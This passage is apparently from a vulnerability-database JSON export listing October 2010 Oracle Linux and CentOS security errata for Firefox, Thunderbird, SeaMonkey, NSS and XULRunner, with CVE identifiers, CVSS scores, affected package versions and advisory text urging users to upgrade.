"enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3182", "CVE-2010-3170"], "modified": "2010-10-20T00:00:00", "id": "ELSA-2010-0781", "href": "http://linux.oracle.com/errata/ELSA-2010-0781.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:48:21", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "ia64", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.ia64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "x86_64", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-31.0.1.el4", "arch": "i386", "packageFilename": "thunderbird-1.5.0.12-31.0.1.el4.i386.rpm", "packageName": "thunderbird", "operator": "lt"}], "description": "[1.5.0.12-31.0.1.el4]\n- Add thunderbird-oracle-default-prefs.js for errata rebuild and remove\n thunderbird-redhat-default-prefs.js\n Replaced clean.gif in tarball\n[1.5.0.12-31]\n- Added fixes from 1.9.1.14", "edition": 3, "reporter": "Oracle", "published": "2010-10-20T00:00:00", "title": "thunderbird security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3182"], "modified": "2010-10-20T00:00:00", "id": "ELSA-2010-0780", "href": "http://linux.oracle.com/errata/ELSA-2010-0780.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:40:11", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "src", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "src", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "src", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "x86_64", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "ia64", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "3.6.11-4.0.1.el4_8", "arch": "i386", "packageFilename": "firefox-3.6.11-4.0.1.el4_8.i386.rpm", "packageName": "firefox", "operator": "lt"}], "description": "[3.6.11-4.0.1.el4_8]\r\n- Add firefox-oracle-default-prefs.js and firefox-oracle-default-bookmarks.html\r\n and remove the corresponding Red Hat ones\r\n \n[3.6.11-4.el4_8]\r\n- Add upstream patch for CVE-2010-3765 ", "edition": 3, "reporter": "Oracle", "published": "2010-10-28T00:00:00", "title": "firefox security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-28T00:00:00", "id": "ELSA-2010-0808", "href": "http://linux.oracle.com/errata/ELSA-2010-0808.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:46:22", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "ia64", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.ia64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "i386", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.i386.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-33.0.1.el4", "arch": "x86_64", "packageFilename": "thunderbird-1.5.0.12-33.0.1.el4.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}], "description": "[1.5.0.12-33.0.1.el4]\n- Add thunderbird-oracle-default-prefs.js for errata rebuild and remove\n thunderbird-redhat-default-prefs.js\n Replaced clean.gif in tarball\n[1.5.0.12-33]\n- Added fixes from 1.9.1.15", "edition": 3, "reporter": "Oracle", "published": "2010-10-29T00:00:00", "title": "thunderbird security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-29T00:00:00", "id": "ELSA-2010-0812", "href": "http://linux.oracle.com/errata/ELSA-2010-0812.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:25:28", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0782.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-devel-3.12.8-1.el5.centos.x86_64.rpm", "packageName": "nss-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-devel-3.12.8-1.el4_8.x86_64.rpm", "packageName": "nss-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-tools-3.12.8-1.el4_8.i386.rpm", "packageName": "nss-tools", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.6.11-2.el4.centos", "packageFilename": "firefox-3.6.11-2.el4.centos.i386.rpm", "packageName": "firefox", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.x86_64.rpm", "packageName": "xulrunner", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.x86_64.rpm", "packageName": "nss", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.src.rpm", "packageName": "xulrunner", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.src.rpm", "packageName": "xulrunner", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.x86_64.rpm", "packageName": "firefox", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-devel-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-devel-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.src.rpm", "packageName": "nss", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.src.rpm", "packageName": "nss", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.src.rpm", "packageName": "firefox", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.src.rpm", "packageName": "firefox", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.x86_64.rpm", "packageName": "xulrunner-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.6.11-2.el4.centos", "packageFilename": "firefox-3.6.11-2.el4.centos.x86_64.rpm", "packageName": "firefox", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-tools-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-tools", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "packageFilename": "xulrunner-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.centos.x86_64.rpm", "packageName": "nss-pkcs11-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.src.rpm", "packageName": "nss", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.src.rpm", "packageName": "nss", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.i386.rpm", "packageName": "nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-3.12.8-1.el4_8.i386.rpm", "packageName": "nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-pkcs11-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.centos.i386.rpm", "packageName": "nss-pkcs11-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-tools-3.12.8-1.el4_8.x86_64.rpm", "packageName": "nss-tools", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.12.8-1.el4_8", "packageFilename": "nss-devel-3.12.8-1.el4_8.i386.rpm", "packageName": "nss-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-3.12.8-1.el5.centos.x86_64.rpm", "packageName": "nss", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.i386.rpm", "packageName": "firefox", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.6.11-2.el5.centos", "packageFilename": "firefox-3.6.11-2.el5.centos.i386.rpm", "packageName": "firefox", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "3.12.8-1.el5.centos", "packageFilename": "nss-tools-3.12.8-1.el5.centos.x86_64.rpm", "packageName": "nss-tools", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.6.11-2.el4.centos", "packageFilename": "firefox-3.6.11-2.el4.centos.src.rpm", "packageName": "firefox", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "3.6.11-2.el4.centos", "packageFilename": "firefox-3.6.11-2.el4.centos.src.rpm", "packageName": "firefox", "arch": "any", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0782\n\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox. Network Security Services (NSS) is\na set of libraries designed to support the development of security-enabled\nclient and server applications.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183,\nCVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running Firefox, allow arbitrary JavaScript to be executed in the\ncontext of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could\ncreate a malicious web page that, when viewed by a victim, could steal\nprivate data from a different website the victim has loaded with Firefox.\n(CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nFirefox, if that user ran Firefox from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nThis update also provides NSS version 3.12.8 which is required by the\nupdated Firefox version, fixing the following security issues:\n\nIt was found that the SSL DHE (Diffie-Hellman Ephemeral) mode\nimplementation for key exchanges in Firefox accepted DHE keys that were 256\nbits in length. This update removes support for 256 bit DHE keys, as such\nkeys are easily broken using modern hardware. (CVE-2010-3173)\n\nA flaw was found in the way NSS matched SSL certificates when the\ncertificates had a Common Name containing a wildcard and a partial IP\naddress. NSS incorrectly accepted connections to IP addresses that fell\nwithin the SSL certificate's wildcard range as valid SSL connections,\npossibly allowing an attacker to conduct a man-in-the-middle attack.\n(CVE-2010-3170)\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 3.6.11. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 3.6.11, which corrects these issues. After installing the\nupdate, Firefox must be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017093.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017094.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017113.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017114.html\n\n**Affected packages:**\nfirefox\nnss\nnss-devel\nnss-pkcs11-devel\nnss-tools\nxulrunner\nxulrunner-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0782.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-10-20T10:29:05", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "firefox, nss, xulrunner security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "modified": "2010-10-25T08:24:38", "href": "http://lists.centos.org/pipermail/centos-announce/2010-October/017093.html", "id": "CESA-2010:0782", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:31", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0781.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-devel-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nss-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-chat-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-chat", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-js-debugger-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-js-debugger", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-chat-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-chat", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-mail-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-mail", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nspr", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nspr", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-nss", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-js-debugger-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-js-debugger", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-dom-inspector", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-devel-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.src.rpm", "packageName": "seamonkey", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.src.rpm", "packageName": "seamonkey", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-devel-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-nspr", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-1.0.9-64.el4.centos.src.rpm", "packageName": "seamonkey", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-1.0.9-64.el4.centos.src.rpm", "packageName": "seamonkey", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-dom-inspector", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-chat-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-chat", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-nspr-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-chat-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-chat", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-devel-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-nss-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nspr-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-mail-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-mail", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-mail-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-mail", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-nss-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-nss", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.centos.x86_64.rpm", "packageName": "seamonkey-js-debugger", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-js-debugger", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-devel-1.0.9-0.61.el3.centos3.i386.rpm", "packageName": "seamonkey-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.0.9-64.el4.centos", "packageFilename": "seamonkey-devel-1.0.9-64.el4.centos.i386.rpm", "packageName": "seamonkey-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "3", "packageVersion": "1.0.9-0.61.el3.centos3", "packageFilename": "seamonkey-mail-1.0.9-0.61.el3.centos3.x86_64.rpm", "packageName": "seamonkey-mail", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0781\n\n\nSeaMonkey is an open source web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2010-3176, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in SeaMonkey converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running SeaMonkey, allow arbitrary JavaScript to be executed in\nthe context of the Gopher domain. (CVE-2010-3177)\n\nA flaw was found in the script that launches SeaMonkey. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nSeaMonkey, if that user ran SeaMonkey from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nIt was found that the SSL DHE (Diffie-Hellman Ephemeral) mode\nimplementation for key exchanges in SeaMonkey accepted DHE keys that were\n256 bits in length. This update removes support for 256 bit DHE keys, as\nsuch keys are easily broken using modern hardware. (CVE-2010-3173)\n\nA flaw was found in the way SeaMonkey matched SSL certificates when the\ncertificates had a Common Name containing a wildcard and a partial IP\naddress. SeaMonkey incorrectly accepted connections to IP addresses that\nfell within the SSL certificate's wildcard range as valid SSL connections,\npossibly 